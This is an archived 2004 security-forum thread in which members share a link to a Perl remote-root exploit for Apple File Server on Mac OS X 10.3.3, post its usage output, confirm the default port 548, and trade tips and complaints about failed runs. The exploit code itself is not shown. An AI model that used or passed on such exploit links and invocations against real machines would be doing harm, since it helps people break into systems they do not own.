Help
-
Search
-
Member List
-
Calendar
Full Version:
Mac Os X <=10.3.3 Applefileserver Overflow Remote
GovernmentSecurity.org
>
The Archives
>
Exploit Articles
Icarus
Aug 13 2004, 03:39 PM
I found this exploit on k-otic
CODE
http://www.k-otik.com/exploits/08132004.priv8afp.pl.php
CODE
# [wsxz@localhost buffer]$ perl priv8afp.pl -h 10.4.12.199 -t 0
# -=[Priv8security.com Apple File Server remote root exploit!]=-
#
# [+] Using target: MacOSX 10.3.3
# [+] Using ret: 0xf0101cb0
# [+] Sending Request Opensession... DOne!
# [+] Got response packet:
# Flags: 1 Cmd: 4 ID: 31337
# [+] Sending FPloginEXT packet... DOne!
# [+] Waiting... We got in =)
globey
Aug 13 2004, 07:26 PM
its working on port 548?
hidden
Aug 13 2004, 07:48 PM
ya i believe is that 548
twistedps
Aug 13 2004, 07:53 PM
QUOTE
if (defined($args{'p'})) { $port = $args{'p'};}else{$port = 548;}
it needs more offsets tho..
hidden
Aug 13 2004, 08:11 PM
i no is not really cool to ask it but i don't arrive to compile it with pearl
cose i'm the pearl's noob ya ya i agree ... grrrr
someone can compile it and share it for the communauty plz
thx all in advence
Reaper527
Aug 13 2004, 08:59 PM
you don't compile perl, also there is no a in perl. you just make a .pl file and run it
think of it as a .bat file with more power.
Ecko
Aug 13 2004, 09:28 PM
QUOTE
mac.pl -h *.*.*.*-t 0
-=[Priv8security.com Apple File Server remote root exploit!]=-
[+] Using target: MacOSX 10.3.3
[+] Using ret: 0xf0101cb0
[+] Sending Request Opensession... DOne!
[+] Got response packet:
Flags: 1 Cmd: 4 ID: 31337
[+] Sending FPloginEXT packet... DOne!
[+] Waiting... No luck
Unknown error
hm don't w0rk 4 me...
Paul
Aug 14 2004, 07:39 AM
Does it needs to have a banner check first ?
Icarus
Aug 14 2004, 03:37 PM
ok i have compile this
CODE
http://www.governmentsecurity.org/forum/index.php?act=ST&f=19&t=10632
This is a "lo-fi" version of our main content. To view the full version with more information, formatting and images, please
click here
.
Invision Power Board © 2001-2005
Invision Power Services, Inc.
think of it as a .bat file with more power.
Unknown error